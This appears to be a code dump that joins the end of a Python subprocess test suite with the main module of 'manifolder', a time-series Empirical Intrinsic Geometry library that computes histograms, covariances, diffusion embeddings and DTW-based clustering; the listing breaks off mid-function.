if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
main.py
|
__all__ = (
'Manifolder',
)
import numpy as np
from numpy.linalg import inv
from numpy.linalg import pinv
from sklearn.cluster import KMeans
from manifolder import helper as mh
try:
from multiprocessing import Pool, TimeoutError, Lock#, Process, Manager
from manifolder.parallel import workers
enable_multiprocessing = True
except:
enable_multiprocessing = False
import functools
from functools import partial
import time
import sys
import os
import math
#import tslearn
#from tslearn.metrics import dtw
#from tslearn.metrics import cdist_dtw
import sklearn_extra
from sklearn_extra.cluster import KMedoids
import dtw
#from pyclustering.utils import calculate_distance_matrix
from pyclustering.cluster.kmedoids import kmedoids
import random
from random import sample
print = functools.partial(print, flush=True)
def test():
print('test function called')
# class LinearRegression(MultiOutputMixin, RegressorMixin, LinearModel):
class Manifolder():
"""
Implementation of Emperical Intrinsic Geometry (EIG) for time-series.
Parameters
----------
dim : int, optional, default 3
The dimension of the underlying manifold.
This will typically be somewhat smaller than the dimension of the data
H: int, optional, default 40
Non-overlapping window length for histogram/empirical densities estimation
step_size: int, optional, default 5
Stride between histograms
nbins: int, optional, default 5
Number of bins to use when creating histogram
See Also
--------
Notes
-----
Examples
--------
>>> import numpy as np
>>> from sklearn.linear_model import LinearRegression
>>> manifolder = Manifolder().fit(data)
>>> clusters() = manifolder.clusters()
"""
def __init__(self, dim=3, H=40, step_size=5, nbins=5, distance_measure=None, ncov=40, n_jobs=None, num_rdims=10):
self.Dim = dim
self.H = H
self.stepSize = step_size
self.nbins = nbins
self.distance_measure = distance_measure
self.ncov = ncov
self.num_rdims = num_rdims
def fit_transform(self, X, parallel=False, dtw=None, dtw_downsample_factor=1, dtw_dims=None):
"""
Fit (find the underlying manifold).
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Training data
Returns
-------
self : returns an instance of self.
"""
### IMPORTANT - sklearn, and Python / data science in general use the convention where
###
### data = [samples, features]
###
### manifolder takes the data in this semi-standard format, but internally uses the
### 'observations as columns' format from the original MATLAB
###
# print('fit was called, not yet implemented')
self._load_data(X)
if parallel and enable_multiprocessing:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))#, maxtasksperchild=1)
self._histograms_parallel(process_pool=pool)
if dtw == "stack":
self.dtw_matrix_parallel(self.get_snippets(downsample_factor=dtw_downsample_factor,
stack=True, stack_dimensions=dtw_dims), process_pool=pool)
elif dtw == "sum":
pass
#self.dtw_matrix_multidim_sum_parallel(self.zs, dtw_dims)
else:
self._covariances_parallel(process_pool=pool)
self._embedding_parallel(process_pool=pool)
pool.close()
pool.join()
if dtw != None:
return
else:
if parallel:
print("Unable to use multiprocessing, falling back to single-threaded mode")
self._histograms_overlap()
if dtw == "stack":
self.dtw_matrix(self.get_snippets(downsample_factor=dtw_downsample_factor,
stack=True, stack_dimensions=dtw_dims))
return
elif dtw == "sum":
self.dtw_matrix_multidim_sum(self.z, dtw_dims)
return
elif dtw == "raw":
self.dtw_matrix_multidim(self.z)
return
elif dtw == "zscore":
self.dtw_matrix(self.zscore_singledim(self.get_snippets(downsample_factor=dtw_downsample_factor,
stack=True, stack_dimensions=dtw_dims)))
return
elif dtw == "zscore_mdim":
self.dtw_matrix_multidim(self.zscore_multidim(self.z))
return
else:
self._covariances()
self._embedding()
return self.Psi # the final clustering is in Psi
# self._clustering()
# sklearn fit() tends to return self
return self
def _load_data(self, data):
""" loads the data, in [samples, nfeatures]
NOTE - internally, data is stored in the
format used in the original code """
if not isinstance(data, list):
self.z = [data.T] # creates a list of length 1
else:
n = len(data)
for snip in range(n):
if snip == 0:
self.z = [data[snip].T]
else:
self.z.append(data[snip].T) # time is a function of the columns, internally
self.N = self.z[0].shape[0] # will be 8, the number of features
#Returns a numpy array of all windows for dtw
def get_windows(self, downsample_factor=1):
i_range = int(np.floor(self.z[0].shape[1] - self.H) / self.stepSize)
n = len(self.z) * int(np.floor(self.z[0].shape[1] - self.H) / self.stepSize)
windows = []
np.zeros((self.H//downsample_factor))
for snip in range(len(self.z)):
z = self.z[snip]
#currently only using one dimension, can add dimensions through stacking
#for dim in range(self.N):
# series = z[dim, :] grab a row of data
for i in range(i_range):
windows[snip*len(self.z)+i, :] = self.downsample(z[i * self.stepSize:i * self.stepSize + self.H], downsample_factor)
return windows
#returns a 2d numpy array of all snippets. If stack is left false, only the first
# dimension of the data will be used. If true, it will stack the dimensions
# specified in the iterable stack_dimensions, or all dimensions if stack_dimensions
# is left as None, by interleaving the data points from each dimension
def get_snippets(self, downsample_factor=1, stack=False, stack_dimensions=None):
data_len = self.z[0].shape[1]
if not stack:
num_dims = 1
stack_dimensions = (0,)
if stack_dimensions == None:
num_dims = self.z[0].shape[0]
stack_dimensions = range(num_dims)
else:
num_dims = len(stack_dimensions)
all_snippets = np.zeros((len(self.z), (data_len // downsample_factor) * num_dims))
if stack:
print("stacking " + str(num_dims) + " dimensions")
for snip in range(len(self.z)):
z = self.z[snip]
dims = np.zeros((num_dims, data_len // downsample_factor))
for d in range(num_dims):
dims[d,:] = self.downsample(z[d,:], downsample_factor)[:]
all_snippets[snip,:] = self.stack(dims)[:]
print("done stacking")
else:
for snip in range(len(self.z)):
z = self.z[snip]
all_snippets[snip,:] = self.downsample(z[0, :], downsample_factor)
print(all_snippets.shape)
return all_snippets
def downsample(self, x, skip):
if isinstance(x, list):
length = len(x)
elif isinstance(x, np.ndarray):
length = x.shape[0]
y = np.zeros(length//skip)
j=0
for i in range(0, length, skip):
y[j] = x[i]
j += 1
return y
def stack(self, dims):
#transposing results in the data points from each dimension being interwoven.
# to connect each dimension end to end, simply remove the call to np.transpose
return np.transpose(dims).flatten()
def dtw_matrix(self, data):
start_time = time.time()
self.dtw_matrix = np.zeros((data.shape[0], data.shape[0]))
print(self.dtw_matrix.shape)
start_time = time.time()
for i in range(data.shape[0]):
for j in range(i):
dtw_result = dtw.dtw(data[i,:], data[j,:])#, window_type="sakoechiba", window_args={"window_size":2})
self.dtw_matrix[i,j] = dtw_result.distance
self.dtw_matrix[j,i] = dtw_result.distance
elapsed_time = time.time() - start_time
print('DTW done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print(self.dtw_matrix)
return self.dtw_matrix
def zscore_singledim(self, data):
#subtract mean and divide by standard deviation
new_data = np.zeros(data.shape)
for i in range(data.shape[0]):
new_data[i,:] = (data[i,:] - np.mean(data[i,:])) / np.std(data[i,:])
return new_data
def zscore_multidim(self, data):
arr = []
for i in range(len(data)):
snippet = data[i]
new_data = np.zeros(snippet.shape)
for j in range(snippet.shape[0]):
new_data[j,:] = (snippet[j,:] - np.mean(snippet[j,:])) / np.std(snippet[j,:])
arr.append(new_data)
return arr
def dtw_matrix_multidim(self, data):
start_time = time.time()
self.dtw_matrix = np.zeros((len(data), len(data)))
print(self.dtw_matrix.shape)
start_time = time.time()
for i in range(len(data)):
for j in range(i):
dtw_result = dtw.dtw(data[i], data[j])#, window_type="sakoechiba", window_args={"window_size":2})
self.dtw_matrix[i,j] = dtw_result.distance
self.dtw_matrix[j,i] = dtw_result.distance
elapsed_time = time.time() - start_time
print('DTW done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print(self.dtw_matrix)
return self.dtw_matrix
def dtw_matrix_multidim_sum(self, data, dims=None):
if dims == None:
dims = tuple(range(data[0].shape[0]))
print(dims)
start_time = time.time()
self.dtw_matrix = np.zeros((len(data), len(data)))
for dim in dims:
single_dim = self.get_snippets(stack=True, stack_dimensions=(dim,))
print(self.dtw_matrix.shape)
start_time = time.time()
for i in range(single_dim.shape[0]):
for j in range(i):
dtw_result = dtw.dtw(single_dim[i,:], single_dim[j,:])#, window_type="sakoechiba", window_args={"window_size":2})
self.dtw_matrix[i,j] += dtw_result.distance
self.dtw_matrix[j,i] += dtw_result.distance
elapsed_time = time.time() - start_time
print('DTW done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print(self.dtw_matrix)
return self.dtw_matrix
def dtw_call(self, x, y):
#here is where you can change dtw params for KMedoids clustering
dtw_result = dtw.dtw(x,y)#, window_type="sakoechiba", window_args={"window_size":2})
return dtw_result.distance
def dtw_clustering_skl(self, num_clusters=7):
all_windows = []
all_snippets = []
for snip in range(10):#len(self.z)):
z = self.z[snip]
#for dim in range(self.N):
series = z[1, :] # z[dim, :] grab a row of data
all_snippets.append(series)
i_range = int(np.floor(z.shape[1] - self.H) / self.stepSize)
for i in range(i_range):
#you can add in the downsampling here
all_windows.append(self.downsample(series[i * self.stepSize:i * self.stepSize + self.H], 10))
func = self.dtw_call
print("dtw clustering on windows ... ", end="")
start_time = time.time()
kmedoids = KMedoids(n_clusters = num_clusters, metric=func, init="random").fit(all_windows)
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print("dtw cluster centers:")
print(kmedoids.cluster_centers_)
print("dtw cluster labels:")
print(kmedoids.labels_)
self.kmedoids_windows = kmedoids
print("dtw clustering on full snippets ... ", end="")
start_time = time.time()
kmedoids = KMedoids(n_clusters = num_clusters, metric=func, init="random").fit(all_snippets)
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print("dtw cluster centers:")
print(kmedoids.cluster_centers_)
print("dtw cluster labels:")
print(kmedoids.labels_)
self.kmedoids_snippets = kmedoids
return kmedoids
def _histograms_overlap(self):
n = len(self.z)
hist_bins = mh.histogram_bins_all_snips(self.z, self.nbins)
# JD
# z_hist = [] # will build up list of histograms, one for per snippet
# for z in self.z:
# z is a single snippet here, and self.z is the full list of all snippets
for snip in range(n):
## Concatenate 1D histograms (marginals) of each sensor in short windows
z_hist_list = [] # in Python, lists are sometimes easier than concatinate
z = self.z[snip]
print('calculating histograms for snip ', snip, ' of ', n, ' (dim ', self.N ,' timeseries) ', end='')
# for dim=1:N
for dim in range(self.N): # loop run standard Python indexing, starting at dim = 0
print('.', end='')
series = z[dim, :] # grab a row of data
# NOTE, MATLAB and python calculate histograms differently
# MATLAB uses nbins values, as bins centerpoints, and
# Python uses nbins+1 values, to specify the bin endpoints
# note, hist_bins will always be [0 .25 .5 .75 1], in MATLAB
# equivalent for python hist is
# [-0.12 0.128 0.376 0.624 0.872 1.12 ]
# hist_bins = mh.histogram_bins_centered(series, self.nbins)
z_hist_dim_list = []
# for i=1:floor((size(z,2)-H)/stepSize)
i_range = int(np.floor(z.shape[1] - self.H) / self.stepSize)
for i in range(i_range):
# interval = z(dim, 1 + (i - 1) * stepSize: (i - 1) * stepSize + H);
interval = series[i * self.stepSize:i * self.stepSize + self.H]
# take the histogram here, and append it ... should be nbins values
# first value returned by np.histogram the actual histogram
#
# NOTE!!! these bins to not overlap completely with the MATLAB version,
# but are roughly correct ... probably exact boundaries are not the same,
# would need to look into this ...
#
hist = np.histogram(interval, hist_bins[dim])[0]
z_hist_dim_list.append(hist)
# convert from a list, to array [nbins x (series.size/stepSize?)]
z_hist_dim = np.array(z_hist_dim_list).T
# z_hist = [z_hist; z_hist_dim];
z_hist_list.append(z_hist_dim)
# JD
# z_hist.append(np.concatinate(z_hist_list))
# convert from list back to numpy array
if snip == 0:
self.z_hist = [np.concatenate(z_hist_list)]
self.snip_number = snip*np.ones(self.z_hist[snip].shape[1])
else:
self.z_hist.append(np.concatenate(z_hist_list))
self.snip_number = np.append(self.snip_number,snip*np.ones(self.z_hist[snip].shape[1]))
print(' done') # prints 'done' after each snip
def _covariances(self):
#
#
## Configuration
# ncov = 10 # (previous value) size of neighborhood for covariance
# ncov = 40 # size of neighborhood for covariance
# ncov is passed in, above
n = len(self.z_hist)
for snip in range(n):
print('computing local covariances for snip ', snip, ' of ', n, end='')
z_hist = self.z_hist[snip]
z_mean = np.zeros_like(z_hist) # Store the mean histogram in each local neighborhood
# NOTE, original matlab call should have used N * nbins ... length(hist_bins) works fine in MATLAB,
# but in python hist_bins has one more element than nbins, since it defines the boundaries ...
# inv_c = zeros(N*length(hist_bins), N*length(hist_bins), length(z_hist))
# Store the inverse covariance matrix of histograms in each local neighborhood
inv_c = np.zeros((self.N * self.nbins, self.N * self.nbins, z_hist.shape[1]))
# precalculate the values over which i will range ...
# this is like 40 to 17485 (inclusive) in python
# 41 to 17488 in MATLAB ... (check?)
irange = range(self.ncov, z_hist.shape[1] - self.ncov - 1)
# instead of waitbar, print .......... to the screen during processing
waitbar_increments = int(irange[-1] / 10)
for i in irange:
if i % waitbar_increments == 0:
print('.', end='')
# not sure of the final number boundary for the loop ...
# win = z_hist(:, i-ncov:i+ncov-1)
# TODO - Alex, is this the right range in MATLAB?
win = z_hist[:,
i - self.ncov:i + self.ncov] # python, brackets do not include end, in MATLAB () includes end
###
### IMPORTANT - the input to the cov() call in MATLAB is TRANSPOSED compared to numpy
### cov(win.T) <=> np.cov(win)
###
#
# # Python example
# A = np.array([[0, 1 ,2],[3, 4, 5]])
# print(A)
# print(np.cov(A.T))
#
# % MATLAB example
# >> A = [[0 1 2];[3 4 5]]
# >> cov(A)
#
# TODO - lol, don't use 40x40, use a different number of bins, etc.
c = np.cov(win)
# De-noise via projection on "known" # of dimensions
# [U S V] = svd(c); # matlab
# python SVD looks very similar to MATLAB:
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.linalg.svd.html
# factors a such that a == U @ S @ Vh
# Compute full svd
# U, S, V = mh.svd_like_matlab(c)
# Compute largest singular vectors only
U, S, V = mh.svds_like_matlab(c, self.Dim)
# inverse also works the same in Python as MATLAB ...
# matlab:
# >> X = [1 0 2; -1 5 0; 0 3 -9]
# >> Y = inv(X)
#
# 0.8824 -0.1176 0.1961
# 0.1765 0.1765 0.0392
# 0.0588 0.0588 -0.0980
#
# Python:
# X = np.array([[1, 0, 2],[-1, 5, 0],[0, 3, -9]])
# Y = inv(X)
#
# [[ 0.8824 -0.1176 0.1961]
# [ 0.1765 0.1765 0.0392]
# [ 0.0588 0.0588 -0.098 ]]
# inv_c(:,:,i) = U(:,1:Dim) * inv(S(1:Dim,1:Dim)) * V(:,1:Dim)' # matlab
inv_c[:, :, i] = U[:, :self.Dim] @ pinv(S[:self.Dim, :self.Dim]) @ V[:, :self.Dim].T # NICE!
# z_mean(:, i) = mean(win, 2); # matlab
z_mean[:, i] = np.mean(win, 1)
# append z_mean and inv_c as next rows of mat
if snip == 0:
self.z_mean = z_mean
self.inv_c = inv_c
else:
self.z_mean = np.append(self.z_mean, z_mean, axis=1)
self.inv_c = np.append(self.inv_c, inv_c, axis=2)
print(' done') # prints done at the end of each snip
def _embedding(self):
###
### Part I
###
## Configuration
# the variable m defines some subset of the data, to make computation faster;
# this could be various values (10% of the data, all the data, etc.), as long
# as it is not GREATER than the length of data.
# For the smallest change, setting to min 4000 or the data size
# m = 4000 # starting point for sequential processing/extension
#
# TODO - m allows you to sample various sections of the manifold, ratheer than looking at
# all points to all points
# the random points can come from the different chunks as well?
# ... for ease of coding, the datastructure could be back to 2D data
m = np.min((4000, self.z_mean.shape[1]))
print('using', m, 'for variable m')
data = self.z_mean.T # set the means as the input set
M = data.shape[0]
# Choose subset of examples as reference
# this is 'take m (4000) random values from z_mean, and sort them
# subidx = sort(randperm(size(z_mean, 2), m))
# Choose first m examples as reference (commented out, don't do this
# subidx = 1:m;
subidx = np.arange(self.z_mean.shape[1])
np.random.shuffle(subidx) # shuffle is inplace in python
subidx = subidx[:m] # take a portion of the data
subidx.sort() # sort is also in place ...
# dataref = data(subidx,:)
dataref = data[subidx, :]
##
# Affinity matrix computation
print('computing Dis matrix ', end='')
waitbar_increments = m // 10
Dis = np.zeros((M, m))
for j in range(m):
if j % waitbar_increments == 0:
print('.', end='')
tmp1 = self.inv_c[:, :, subidx[j]] @ dataref[j, :].T # 40, in Python
a2 = np.dot(dataref[j, :], tmp1) # a2 is a scalar
b2 = np.sum(data * (self.inv_c[:, :, subidx[j]] @ data.T).T, 1)
ab = data @ tmp1 # only @ works here
# this tiles the matrix ... repmat is like np.tile
# Dis[:,j] = repmat[a2, M, 1] + b2 - 2*ab
Dis[:, j] = (np.tile(a2, [M, 1])).flatten() + b2 - 2 * ab
print('done!')
## Anisotropic kernel
print('aniostropic kernel ... ', end='')
ep = np.median(np.median(Dis, 0)) # default scale - should be adjusted for each new realizations
A = np.exp(-Dis / (4 * ep))
W_sml = A.T @ A
d1 = np.sum(W_sml, 0)
A1 = A / np.tile(np.sqrt(d1), [M, 1])
W1 = A1.T @ A1
d2 = np.sum(W1, 0)
A2 = A1 / np.tile(np.sqrt(d2), [M, 1])
W2 = A2.T @ A2
D = np.diag(np.sqrt(1 / d2))
###
### Part II
###
# Compute eigenvectors
# in numpy,
# from numpy import linalg as LA
# w, v = LA.eig(np.diag((1, 2, 3)))
# v are the values, diagonal in a matrix, and w are the eigenvectors
# Compute all eigenvectors and select 10
# [V, E] = eigs(W2, 10) Matlab
# V, E = mh.eig_like_matlab(W2, 10) # think this is correct now ...
# Compute only 10 eigenvectors, must have symmetric matrix
# V, E = mh.eigs_like_matlab(W2,10)
num_rdims =self.num_rdims
V, E = mh.eigs_like_matlab(W2,num_rdims)
# print('V.shape', V.shape)
# print('E.shape', E.shape)
# python np.sum(A,0) <=> matlab sum(A)
# in matlab, srted are the values of sum(E) sorted (in descending order)
# and IE are the indices that sorted them
# [srtdE, IE] = sort(sum(E), 'descend')
# this is python eqivalent ... note that IE will have values one less than the MATLAB, because zero indexing
# TODO - is this sorted right?
IE = np.sum(E, 0).argsort()[::-1] # find the indices to sort, and reverse them
srtdE = np.sum(E, 0)[IE]
# Phi = D @ V(:, IE(1, 2:10))
Phi = D @ V[:, IE[1:]]
print('done')
###
### Part III
###
# TODO - not necessary? (Independent coordinates?)
# Extend reference embedding to the entire set
print('extending embedding (building Psi) ... ', end='')
Psi_list = [] # holds all the psi_i values
omega = np.sum(A2, 1)
A2_nrm = A2 / np.tile(omega.reshape([-1, 1]), [1, m]) # omega needed to be shaped as a column
# for i=1:size(Phi,2)
for i in range(Phi.shape[1]):
# this line is strange ... order of operations for @?, what is the offset?
psi_i = A2_nrm @ Phi[:, i] / np.sqrt((srtdE[i + 1]))
# [Psi, psi_i]
Psi_list.append(psi_i)
# convert Psi_list back into an array, shaped like MATLAB version
self.Psi = np.array(Psi_list).T
# psi have have very small imaginary values ...
# cast to real here, but need to check
self.Psi = np.real(self.Psi)
# print('Psi.shape', Psi.shape)
print('done')
# Since close to a degenerate case - try to rotate according to:
# A. Singer and R. R. Coifman, "Spectral ICA", ACHA 2007.
#
def _clustering(self, numClusters=7, kmns=True, distance_measure=None, nrep=1):
# Cluster embedding and generate figures and output files
# ***************************************************************@
import matplotlib.pyplot as plt
# Configuration
intrinsicDim = self.Dim # can be varied slightly but shouldn't be much larger than Dim
## Clusters
# IDX = kmeans(Psi(:, 1:intrinsicDim), numClusters)
# Python kmeans see
# https://docs.scipy.org/doc/scipy-0.15.1/reference/generated/scipy.cluster.vq.kmeans.html
# scipy.cluster.vq.kmeans(obs, k_or_guess, iter=20, thresh=1e-05)
#
# note, python expects each ROW to be an observation, looks the same a matlap
#
if kmns == True:
print('running k-means')
kmeans = KMeans(n_clusters=numClusters).fit(self.Psi[:, :intrinsicDim])
self.IDX = kmeans.labels_
else:
print('calculating distances')
if (distance_measure == None):
print('Euclidean distances used in clustering')
row, col = self.Psi.shape
combined = []
for i1 in range(row):
combined.append(self.Psi[i1, :intrinsicDim])
distmat = calculate_distance_matrix(combined)
else:
#elif (distance_measure == 'dtw'):
print('DTW distances used in clustering')
distmat = self.dtw_distmat
print('sampling initial medoids')
sample_idx = random.sample(range(distmat.shape[0]), numClusters)
initial_medoids = sample_idx
print('running k-medoids')
self.kmeds = kmedoids(distmat, initial_medoids, data_type='distance_matrix')
self.kmeds.process()
temp_idx = np.array(self.kmeds.get_clusters())
final_idx = []
for i1 in range(distmat.shape[0]):
for j1 in range(numClusters):
if (i1 in temp_idx[j1]):
final_idx.append(j1)
self.IDX = np.array(final_idx)
print(self.IDX.shape)
if (distance_measure != None):
return
# TODO decide how to plot multiple snips
# think that x_ref[1,:] is just
for snip in range(len(self.z)):
if snip == 0:
x = self.z[snip][5, :]
x = x[0:x.shape[0]-self.H]
xref1 = x[::self.stepSize] # downsample, to match the data steps
else:
x = self.z[snip][5, :]
x = x[0:x.shape[0]-self.H]
x = x[::self.stepSize]
xref1 = np.append(xref1, x)
print(xref1.shape)
xs = self.Psi[:, 0]
ys = self.Psi[:, 1]
zs = self.Psi[:, 2]
# normalize these to amplitude one?
print('normalizing amplitudes of Psi in Python ...')
xs /= np.max(np.abs(xs))
ys /= np.max(np.abs(ys))
zs /= np.max(np.abs(zs))
# xs -= np.mean(xs)
# ys -= np.mean(ys)
# zs -= np.mean(zs)
# xs /= np.std(xs)
# ys /= np.std(ys)
# zs /= np.std(zs)
print(xs.shape)
lim = 2000
val = xref1[:lim]
idx = self.IDX[:lim]
plt.figure(figsize=[15, 3])
plt.plot(xref1[:lim], color='black', label='Timeseries')
plt.plot(xs[:lim], linewidth=.5, label='psi_0')
plt.plot(ys[:lim], linewidth=.5, label='psi_1')
plt.plot(zs[:lim], linewidth=.5, label='psi_2')
plt.plot(idx / np.max(idx) + 1, linewidth=.8, label='IDX')
if np.max(self.snip_number[:lim])>0:
plt.plot(self.snip_number[:lim] / np.max(self.snip_number[:lim]) - 2, linewidth=.8, label='Snip Number')
plt.legend()
# rightarrow causes an image error, when displayed in github!
# plt.xlabel('Time $ \\rightarrow $')
plt.xlabel('Time')
plt.ylabel('Value')
# plt.gca().autoscale(enable=True, axis='both', tight=None )
# plt.gca().xaxis.set_ticklabels([])
# plt.gca().yaxis.set_ticklabels([])
plt.title('Example Timeseries and Manifold Projection')
print('done')
###
### additional parsing, for color graphs
###
import matplotlib
cmap = matplotlib.cm.get_cmap('Spectral')
r = xs[:lim]
g = ys[:lim]
b = zs[:lim]
# prevent the jump in data value
r[:self.H] = r[self.H]
g[:self.H] = g[self.H]
b[:self.H] = b[self.H]
r -= np.min(r)
r /= np.max(r)
g -= np.min(g)
g /= np.max(g)
b -= np.min(b)
b /= np.max(b)
plt.figure(figsize=[15, 3])
for i in range(lim - 1):
col = [r[i], g[i], b[i]]
plt.plot([i, i + 1], [val[i], val[i + 1]], color=col)
plt.title('data, colored according to Psi (color three-vector)')
plt.xlabel('Time')
plt.ylabel('Value')
plt.show()
if enable_multiprocessing:
def _histograms_parallel(self, process_pool=None):
n = len(self.z)
hist_bins = mh.histogram_bins_all_snips(self.z, self.nbins)
# JD
# z_hist = [] # will build up list of histograms, one for per snippet
# for z in self.z:
# z is a single snippet here, and self.z is the full list of all snippets
print("Calculating histograms in parallel ... ", end='')
start_time = time.time()
histfunc = partial(workers.histograms, self.z, self.H, self.stepSize, self.N, hist_bins)
pool = process_pool
if process_pool == None:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))
results = pool.map(histfunc, range(n), chunksize=5)
if process_pool == None:
pool.close()
pool.join()
for snip in range(n):
# convert from list back to numpy array
if snip == 0:
self.z_hist = [np.concatenate(results[snip])]
self.snip_number = snip*np.ones(self.z_hist[snip].shape[1])
else:
self.z_hist.append(np.concatenate(results[snip]))
self.snip_number = np.append(self.snip_number,snip*np.ones(self.z_hist[snip].shape[1]))
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
def _covariances_parallel(self, process_pool=None):
#
#
## Configuration
# ncov = 10 # (previous value) size of neighborhood for covariance
# ncov = 40 # size of neighborhood for covariance
# ncov is passed in, above
n = len(self.z_hist)
print("Computing local covariances in parallel ... ", end='')
start_time = time.time()
covfunc = partial(workers.covars, self.z_hist, self.ncov, self.nbins, self.N, self.Dim)
pool = process_pool
if process_pool == None:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))
results = pool.map(covfunc, range(n), chunksize=5)
if process_pool == None:
pool.close()
pool.join()
for snip in range(n):
z_mean, inv_c = results[snip]
# append z_mean and inv_c as next rows of mat
if snip == 0:
self.z_mean = z_mean
self.inv_c = inv_c
else:
self.z_mean = np.append(self.z_mean, z_mean, axis=1)
self.inv_c = np.append(self.inv_c, inv_c, axis=2)
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
def _embedding_parallel(self, process_pool=None):
###
### Part I
###
## Configuration
# the variable m defines some subset of the data, to make computation faster;
# this could be various values (10% of the data, all the data, etc.), as long
# as it is not GREATER than the length of data.
# For the smallest change, setting to min 4000 or the data size
# m = 4000 # starting point for sequential processing/extension
#
# TODO - m allows you to sample various sections of the manifold, ratheer than looking at
# all points to all points
# the random points can come from the different chunks as well?
# ... for ease of coding, the datastructure could be back to 2D data
m = np.min((4000, self.z_mean.shape[1]))
print('using', m, 'for variable m')
data = self.z_mean.T # set the means as the input set
M = data.shape[0]
# Choose subset of examples as reference
# this is 'take m (4000) random values from z_mean, and sort them
# subidx = sort(randperm(size(z_mean, 2), m))
# Choose first m examples as reference (commented out, don't do this
# subidx = 1:m;
subidx = np.arange(self.z_mean.shape[1])
np.random.shuffle(subidx) # shuffle is inplace in python
subidx = subidx[:m] # take a portion of the data
subidx.sort() # sort is also in place ...
# dataref = data(subidx,:)
dataref = data[subidx, :]
##
# Affinity matrix computation
Dis = np.zeros((M, m))
print('computing Dis matrix in parallel')
start_time = time.time()
pool = process_pool
if process_pool == None:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))
if sys.version_info >= (3,8,0):
print('Python version is >= 3.8, using shared memory')
from multiprocessing import shared_memory
#create shared memory for numpy arrays
shm_inv_c = shared_memory.SharedMemory(name='inv_c',
create=True, size=self.inv_c.nbytes)
shm_subidx = shared_memory.SharedMemory(name='subidx',
create=True, size=subidx.nbytes)
shm_dataref = shared_memory.SharedMemory(name='dataref',
create=True, size=dataref.nbytes)
shm_data = shared_memory.SharedMemory(name='data',
create=True, size=data.nbytes)
shm_result = shared_memory.SharedMemory(name='dis',
create=True, size=Dis.nbytes)
#copy arrays into shared memory
inv_c_copy = np.ndarray(self.inv_c.shape, self.inv_c.dtype, buffer=shm_inv_c.buf)
np.copyto(inv_c_copy, self.inv_c, casting='no')
subidx_copy = np.ndarray(subidx.shape, subidx.dtype, buffer=shm_subidx.buf)
np.copyto(subidx_copy, subidx, casting='no')
dataref_copy = np.ndarray(dataref.shape, dataref.dtype, buffer=shm_dataref.buf)
np.copyto(dataref_copy, dataref, casting='no')
data_copy = np.ndarray(data.shape, data.dtype, buffer=shm_data.buf)
